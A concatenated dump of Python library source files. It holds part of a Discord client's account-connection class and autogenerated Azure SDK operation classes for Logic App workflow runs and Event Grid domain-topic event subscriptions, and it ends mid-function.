guild_id = int(guild_data['id'])
guild = state._get_guild(guild_id)
if guild is None:
guild = Guild(data=guild_data, state=state)
return guild
async def edit(
self,
*,
name: str = MISSING,
visible: bool = MISSING,
friend_sync: bool = MISSING,
show_activity: bool = MISSING,
metadata_visible: bool = MISSING,
) -> Connection:
"""|coro|
Edit the connection.
All parameters are optional.
Parameters
----------
name: :class:`str`
The new name of the connection. Only editable for certain connection types.
visible: :class:`bool`
Whether the connection is visible on your profile.
show_activity: :class:`bool`
Whether activities from this connection will be shown in presences.
friend_sync: :class:`bool`
Whether friends are synced over the connection.
metadata_visible: :class:`bool`
Whether the connection's metadata is visible.
Raises
------
HTTPException
Editing the connection failed.
Returns
-------
:class:`Connection`
The edited connection.
"""
payload = {}
if name is not MISSING:
payload['name'] = name
if visible is not MISSING:
payload['visibility'] = visible
if show_activity is not MISSING:
payload['show_activity'] = show_activity
if friend_sync is not MISSING:
payload['friend_sync'] = friend_sync
if metadata_visible is not MISSING:
payload['metadata_visibility'] = metadata_visible
data = await self._state.http.edit_connection(self.type.value, self.id, **payload)
return Connection(data=data, state=self._state)
async def refresh(self) -> None:
"""|coro|
Refreshes the connection. This updates the connection's :attr:`metadata`.
Raises
------
HTTPException
Refreshing the connection failed.
"""
await self._state.http.refresh_connection(self.type.value, self.id)
async def delete(self) -> None:
"""|coro|
Removes the connection.
Raises
------
HTTPException
Deleting the connection failed.
"""
await self._state.http.delete_connection(self.type.value, self.id)
async def fetch_access_token(self) -> str:
"""|coro|
Retrieves a new access token for the connection.
Only applicable for connections of type:attr:`ConnectionType.twitch`,
:attr:`ConnectionType.youtube`, and :attr:`ConnectionType.spotify`.
Raises
------
HTTPException
Retrieving the access token failed.
Returns
-------
:class:`str`
The new access token.
"""
data = await self._state.http.get_connection_token(self.type.value, self.id)
return data['access_token']
|
PypiClean
|
/azure-mgmt-web-7.1.0.zip/azure-mgmt-web-7.1.0/azure/mgmt/web/v2022_09_01/operations/_workflow_runs_operations.py
|
import sys
from typing import Any, Callable, Dict, Iterable, Optional, TypeVar
import urllib.parse
from azure.core.exceptions import (
ClientAuthenticationError,
HttpResponseError,
ResourceExistsError,
ResourceNotFoundError,
ResourceNotModifiedError,
map_error,
)
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.utils import case_insensitive_dict
from azure.mgmt.core.exceptions import ARMErrorFormat
from .. import models as _models
from ..._serialization import Serializer
from .._vendor import WebSiteManagementClientMixinABC, _convert_request, _format_url_section
if sys.version_info >= (3, 8):
from typing import Literal # pylint: disable=no-name-in-module, ungrouped-imports
else:
from typing_extensions import Literal # type: ignore # pylint: disable=ungrouped-imports
T = TypeVar("T")
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
_SERIALIZER = Serializer()
_SERIALIZER.client_side_validation = False
def build_list_request(
resource_group_name: str,
name: str,
workflow_name: str,
subscription_id: str,
*,
top: Optional[int] = None,
filter: Optional[str] = None,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-09-01"] = kwargs.pop("api_version", _params.pop("api-version", "2022-09-01"))
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop(
"template_url",
"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/sites/{name}/hostruntime/runtime/webhooks/workflow/api/management/workflows/{workflowName}/runs",
) # pylint: disable=line-too-long
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, "str"),
"resourceGroupName": _SERIALIZER.url(
"resource_group_name",
resource_group_name,
"str",
max_length=90,
min_length=1,
pattern=r"^[-\w\._\(\)]+[^\.]$",
),
"name": _SERIALIZER.url("name", name, "str"),
"workflowName": _SERIALIZER.url("workflow_name", workflow_name, "str"),
}
_url: str = _format_url_section(_url, **path_format_arguments) # type: ignore
# Construct parameters
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
if top is not None:
_params["$top"] = _SERIALIZER.query("top", top, "int")
if filter is not None:
_params["$filter"] = _SERIALIZER.query("filter", filter, "str")
# Construct headers
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="GET", url=_url, params=_params, headers=_headers, **kwargs)
def build_get_request(
resource_group_name: str, name: str, workflow_name: str, run_name: str, subscription_id: str, **kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-09-01"] = kwargs.pop("api_version", _params.pop("api-version", "2022-09-01"))
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop(
"template_url",
"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/sites/{name}/hostruntime/runtime/webhooks/workflow/api/management/workflows/{workflowName}/runs/{runName}",
) # pylint: disable=line-too-long
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, "str"),
"resourceGroupName": _SERIALIZER.url(
"resource_group_name",
resource_group_name,
"str",
max_length=90,
min_length=1,
pattern=r"^[-\w\._\(\)]+[^\.]$",
),
"name": _SERIALIZER.url("name", name, "str"),
"workflowName": _SERIALIZER.url("workflow_name", workflow_name, "str"),
"runName": _SERIALIZER.url("run_name", run_name, "str"),
}
_url: str = _format_url_section(_url, **path_format_arguments) # type: ignore
# Construct parameters
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
# Construct headers
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="GET", url=_url, params=_params, headers=_headers, **kwargs)
def build_cancel_request(
resource_group_name: str, name: str, workflow_name: str, run_name: str, subscription_id: str, **kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-09-01"] = kwargs.pop("api_version", _params.pop("api-version", "2022-09-01"))
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop(
"template_url",
"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/sites/{name}/hostruntime/runtime/webhooks/workflow/api/management/workflows/{workflowName}/runs/{runName}/cancel",
) # pylint: disable=line-too-long
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, "str"),
"resourceGroupName": _SERIALIZER.url(
"resource_group_name",
resource_group_name,
"str",
max_length=90,
min_length=1,
pattern=r"^[-\w\._\(\)]+[^\.]$",
),
"name": _SERIALIZER.url("name", name, "str"),
"workflowName": _SERIALIZER.url("workflow_name", workflow_name, "str"),
"runName": _SERIALIZER.url("run_name", run_name, "str"),
}
_url: str = _format_url_section(_url, **path_format_arguments) # type: ignore
# Construct parameters
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
# Construct headers
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="POST", url=_url, params=_params, headers=_headers, **kwargs)
class WorkflowRunsOperations:
"""
.. warning::
**DO NOT** instantiate this class directly.
Instead, you should access the following operations through
:class:`~azure.mgmt.web.v2022_09_01.WebSiteManagementClient`'s
:attr:`workflow_runs` attribute.
"""
models = _models
def __init__(self, *args, **kwargs):
input_args = list(args)
self._client = input_args.pop(0) if input_args else kwargs.pop("client")
self._config = input_args.pop(0) if input_args else kwargs.pop("config")
self._serialize = input_args.pop(0) if input_args else kwargs.pop("serializer")
self._deserialize = input_args.pop(0) if input_args else kwargs.pop("deserializer")
@distributed_trace
def list(
self,
resource_group_name: str,
name: str,
workflow_name: str,
top: Optional[int] = None,
filter: Optional[str] = None,
**kwargs: Any
) -> Iterable["_models.WorkflowRun"]:
"""Gets a list of workflow runs.
:param resource_group_name: Name of the resource group to which the resource belongs. Required.
:type resource_group_name: str
:param name: Site name. Required.
:type name: str
:param workflow_name: The workflow name. Required.
:type workflow_name: str
:param top: The number of items to be included in the result. Default value is None.
:type top: int
:param filter: The filter to apply on the operation. Options for filters include: Status,
StartTime, and ClientTrackingId. Default value is None.
:type filter: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either WorkflowRun or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.web.v2022_09_01.models.WorkflowRun]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-09-01"] = kwargs.pop("api_version", _params.pop("api-version", "2022-09-01"))
cls: ClsType[_models.WorkflowRunListResult] = kwargs.pop("cls", None)
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_request(
resource_group_name=resource_group_name,
name=name,
workflow_name=workflow_name,
subscription_id=self._config.subscription_id,
top=top,
filter=filter,
api_version=api_version,
template_url=self.list.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
# make call to next link with the client's api-version
_parsed_next_link = urllib.parse.urlparse(next_link)
_next_request_params = case_insensitive_dict(
{
key: [urllib.parse.quote(v) for v in value]
for key, value in urllib.parse.parse_qs(_parsed_next_link.query).items()
}
)
_next_request_params["api-version"] = self._config.api_version
request = HttpRequest(
"GET", urllib.parse.urljoin(next_link, _parsed_next_link.path), params=_next_request_params
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("WorkflowRunListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem) # type: ignore
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
_stream = False
pipeline_response: PipelineResponse = self._client._pipeline.run( # pylint: disable=protected-access
request, stream=_stream, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(get_next, extract_data)
list.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/sites/{name}/hostruntime/runtime/webhooks/workflow/api/management/workflows/{workflowName}/runs"
}
@distributed_trace
def get(
self, resource_group_name: str, name: str, workflow_name: str, run_name: str, **kwargs: Any
) -> _models.WorkflowRun:
"""Gets a workflow run.
:param resource_group_name: Name of the resource group to which the resource belongs. Required.
:type resource_group_name: str
:param name: Site name. Required.
:type name: str
:param workflow_name: The workflow name. Required.
:type workflow_name: str
:param run_name: The workflow run name. Required.
:type run_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: WorkflowRun or the result of cls(response)
:rtype: ~azure.mgmt.web.v2022_09_01.models.WorkflowRun
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-09-01"] = kwargs.pop("api_version", _params.pop("api-version", "2022-09-01"))
cls: ClsType[_models.WorkflowRun] = kwargs.pop("cls", None)
request = build_get_request(
resource_group_name=resource_group_name,
name=name,
workflow_name=workflow_name,
run_name=run_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.get.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
_stream = False
pipeline_response: PipelineResponse = self._client._pipeline.run( # pylint: disable=protected-access
request, stream=_stream, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize("WorkflowRun", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/sites/{name}/hostruntime/runtime/webhooks/workflow/api/management/workflows/{workflowName}/runs/{runName}"
}
@distributed_trace
def cancel( # pylint: disable=inconsistent-return-statements
self, resource_group_name: str, name: str, workflow_name: str, run_name: str, **kwargs: Any
) -> None:
"""Cancels a workflow run.
:param resource_group_name: Name of the resource group to which the resource belongs. Required.
:type resource_group_name: str
:param name: Site name. Required.
:type name: str
:param workflow_name: The workflow name. Required.
:type workflow_name: str
:param run_name: The workflow run name. Required.
:type run_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None or the result of cls(response)
:rtype: None
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-09-01"] = kwargs.pop("api_version", _params.pop("api-version", "2022-09-01"))
cls: ClsType[None] = kwargs.pop("cls", None)
request = build_cancel_request(
resource_group_name=resource_group_name,
name=name,
workflow_name=workflow_name,
run_name=run_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.cancel.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
_stream = False
pipeline_response: PipelineResponse = self._client._pipeline.run( # pylint: disable=protected-access
request, stream=_stream, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
cancel.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/sites/{name}/hostruntime/runtime/webhooks/workflow/api/management/workflows/{workflowName}/runs/{runName}/cancel"
}
|
PypiClean
|
/azure-mgmt-eventgrid-10.3.0b1.zip/azure-mgmt-eventgrid-10.3.0b1/azure/mgmt/eventgrid/aio/operations/_domain_topic_event_subscriptions_operations.py
|
import sys
from typing import Any, AsyncIterable, Callable, Dict, IO, Optional, TypeVar, Union, cast, overload
import urllib.parse
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import (
ClientAuthenticationError,
HttpResponseError,
ResourceExistsError,
ResourceNotFoundError,
ResourceNotModifiedError,
map_error,
)
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.core.utils import case_insensitive_dict
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._domain_topic_event_subscriptions_operations import (
build_create_or_update_request,
build_delete_request,
build_get_delivery_attributes_request,
build_get_full_url_request,
build_get_request,
build_list_request,
build_update_request,
)
if sys.version_info >= (3, 8):
from typing import Literal # pylint: disable=no-name-in-module, ungrouped-imports
else:
from typing_extensions import Literal # type: ignore # pylint: disable=ungrouped-imports
T = TypeVar("T")
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class DomainTopicEventSubscriptionsOperations:
"""
.. warning::
**DO NOT** instantiate this class directly.
Instead, you should access the following operations through
:class:`~azure.mgmt.eventgrid.aio.EventGridManagementClient`'s
:attr:`domain_topic_event_subscriptions` attribute.
"""
models = _models
def __init__(self, *args, **kwargs) -> None:
input_args = list(args)
self._client = input_args.pop(0) if input_args else kwargs.pop("client")
self._config = input_args.pop(0) if input_args else kwargs.pop("config")
self._serialize = input_args.pop(0) if input_args else kwargs.pop("serializer")
self._deserialize = input_args.pop(0) if input_args else kwargs.pop("deserializer")
@distributed_trace_async
async def get(
self, resource_group_name: str, domain_name: str, topic_name: str, event_subscription_name: str, **kwargs: Any
) -> _models.EventSubscription:
"""Get a nested event subscription for domain topic.
Get properties of a nested event subscription for a domain topic.
:param resource_group_name: The name of the resource group within the user's subscription.
Required.
:type resource_group_name: str
:param domain_name: Name of the top level domain. Required.
:type domain_name: str
:param topic_name: Name of the domain topic. Required.
:type topic_name: str
:param event_subscription_name: Name of the event subscription. Required.
:type event_subscription_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: EventSubscription or the result of cls(response)
:rtype: ~azure.mgmt.eventgrid.models.EventSubscription
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-06-15"] = kwargs.pop(
"api_version", _params.pop("api-version", self._config.api_version)
)
cls: ClsType[_models.EventSubscription] = kwargs.pop("cls", None)
request = build_get_request(
resource_group_name=resource_group_name,
domain_name=domain_name,
topic_name=topic_name,
event_subscription_name=event_subscription_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.get.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize("EventSubscription", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventGrid/domains/{domainName}/topics/{topicName}/eventSubscriptions/{eventSubscriptionName}"
}
async def _create_or_update_initial(
self,
resource_group_name: str,
domain_name: str,
topic_name: str,
event_subscription_name: str,
event_subscription_info: Union[_models.EventSubscription, IO],
**kwargs: Any
) -> _models.EventSubscription:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-06-15"] = kwargs.pop(
"api_version", _params.pop("api-version", self._config.api_version)
)
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
cls: ClsType[_models.EventSubscription] = kwargs.pop("cls", None)
content_type = content_type or "application/json"
_json = None
_content = None
if isinstance(event_subscription_info, (IO, bytes)):
_content = event_subscription_info
else:
_json = self._serialize.body(event_subscription_info, "EventSubscription")
request = build_create_or_update_request(
resource_group_name=resource_group_name,
domain_name=domain_name,
topic_name=topic_name,
event_subscription_name=event_subscription_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
content_type=content_type,
json=_json,
content=_content,
template_url=self._create_or_update_initial.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize("EventSubscription", pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize("EventSubscription", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {}) # type: ignore
return deserialized # type: ignore
_create_or_update_initial.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventGrid/domains/{domainName}/topics/{topicName}/eventSubscriptions/{eventSubscriptionName}"
}
@overload
async def begin_create_or_update(
self,
resource_group_name: str,
domain_name: str,
topic_name: str,
event_subscription_name: str,
event_subscription_info: _models.EventSubscription,
*,
content_type: str = "application/json",
**kwargs: Any
) -> AsyncLROPoller[_models.EventSubscription]:
"""Create or update a nested event subscription to a domain topic.
Asynchronously creates a new event subscription or updates an existing event subscription.
:param resource_group_name: The name of the resource group within the user's subscription.
Required.
:type resource_group_name: str
:param domain_name: Name of the top level domain. Required.
:type domain_name: str
:param topic_name: Name of the domain topic. Required.
:type topic_name: str
:param event_subscription_name: Name of the event subscription to be created. Event
subscription names must be between 3 and 100 characters in length and use alphanumeric letters
only. Required.
:type event_subscription_name: str
:param event_subscription_info: Event subscription properties containing the destination and
filter information. Required.
:type event_subscription_info: ~azure.mgmt.eventgrid.models.EventSubscription
:keyword content_type: Body Parameter content-type. Content type parameter for JSON body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either EventSubscription or the result of
cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.eventgrid.models.EventSubscription]
:raises ~azure.core.exceptions.HttpResponseError:
"""
@overload
async def begin_create_or_update(
self,
resource_group_name: str,
domain_name: str,
topic_name: str,
event_subscription_name: str,
event_subscription_info: IO,
*,
content_type: str = "application/json",
**kwargs: Any
) -> AsyncLROPoller[_models.EventSubscription]:
"""Create or update a nested event subscription to a domain topic.
Asynchronously creates a new event subscription or updates an existing event subscription.
:param resource_group_name: The name of the resource group within the user's subscription.
Required.
:type resource_group_name: str
:param domain_name: Name of the top level domain. Required.
:type domain_name: str
:param topic_name: Name of the domain topic. Required.
:type topic_name: str
:param event_subscription_name: Name of the event subscription to be created. Event
subscription names must be between 3 and 100 characters in length and use alphanumeric letters
only. Required.
:type event_subscription_name: str
:param event_subscription_info: Event subscription properties containing the destination and
filter information. Required.
:type event_subscription_info: IO
:keyword content_type: Body Parameter content-type. Content type parameter for binary body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either EventSubscription or the result of
cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.eventgrid.models.EventSubscription]
:raises ~azure.core.exceptions.HttpResponseError:
"""
@distributed_trace_async
async def begin_create_or_update(
self,
resource_group_name: str,
domain_name: str,
topic_name: str,
event_subscription_name: str,
event_subscription_info: Union[_models.EventSubscription, IO],
**kwargs: Any
) -> AsyncLROPoller[_models.EventSubscription]:
"""Create or update a nested event subscription to a domain topic.
Asynchronously creates a new event subscription or updates an existing event subscription.
:param resource_group_name: The name of the resource group within the user's subscription.
Required.
:type resource_group_name: str
:param domain_name: Name of the top level domain. Required.
:type domain_name: str
:param topic_name: Name of the domain topic. Required.
:type topic_name: str
:param event_subscription_name: Name of the event subscription to be created. Event
subscription names must be between 3 and 100 characters in length and use alphanumeric letters
only. Required.
:type event_subscription_name: str
:param event_subscription_info: Event subscription properties containing the destination and
filter information. Is either a model type or a IO type. Required.
:type event_subscription_info: ~azure.mgmt.eventgrid.models.EventSubscription or IO
:keyword content_type: Body Parameter content-type. Known values are: 'application/json'.
Default value is None.
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either EventSubscription or the result of
cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.eventgrid.models.EventSubscription]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-06-15"] = kwargs.pop(
"api_version", _params.pop("api-version", self._config.api_version)
)
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
cls: ClsType[_models.EventSubscription] = kwargs.pop("cls", None)
polling: Union[bool, AsyncPollingMethod] = kwargs.pop("polling", True)
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token: Optional[str] = kwargs.pop("continuation_token", None)
if cont_token is None:
raw_result = await self._create_or_update_initial(
resource_group_name=resource_group_name,
domain_name=domain_name,
topic_name=topic_name,
event_subscription_name=event_subscription_name,
event_subscription_info=event_subscription_info,
api_version=api_version,
content_type=content_type,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize("EventSubscription", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True:
polling_method: AsyncPollingMethod = cast(AsyncPollingMethod, AsyncARMPolling(lro_delay, **kwargs))
elif polling is False:
polling_method = cast(AsyncPollingMethod, AsyncNoPolling())
else:
polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method) # type: ignore
begin_create_or_update.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventGrid/domains/{domainName}/topics/{topicName}/eventSubscriptions/{eventSubscriptionName}"
}
async def _delete_initial( # pylint: disable=inconsistent-return-statements
self, resource_group_name: str, domain_name: str, topic_name: str, event_subscription_name: str, **kwargs: Any
) -> None:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-06-15"] = kwargs.pop(
"api_version", _params.pop("api-version", self._config.api_version)
)
cls: ClsType[None] = kwargs.pop("cls", None)
request = build_delete_request(
resource_group_name=resource_group_name,
domain_name=domain_name,
topic_name=topic_name,
event_subscription_name=event_subscription_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self._delete_initial.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventGrid/domains/{domainName}/topics/{topicName}/eventSubscriptions/{eventSubscriptionName}"
}
@distributed_trace_async
async def begin_delete(
self, resource_group_name: str, domain_name: str, topic_name: str, event_subscription_name: str, **kwargs: Any
) -> AsyncLROPoller[None]:
"""Delete a nested event subscription for a domain topic.
Delete a nested existing event subscription for a domain topic.
:param resource_group_name: The name of the resource group within the user's subscription.
Required.
:type resource_group_name: str
:param domain_name: Name of the top level domain. Required.
:type domain_name: str
:param topic_name: Name of the domain topic. Required.
:type topic_name: str
:param event_subscription_name: Name of the event subscription to be deleted. Event
subscription names must be between 3 and 100 characters in length and use alphanumeric letters
only. Required.
:type event_subscription_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-06-15"] = kwargs.pop(
"api_version", _params.pop("api-version", self._config.api_version)
)
cls: ClsType[None] = kwargs.pop("cls", None)
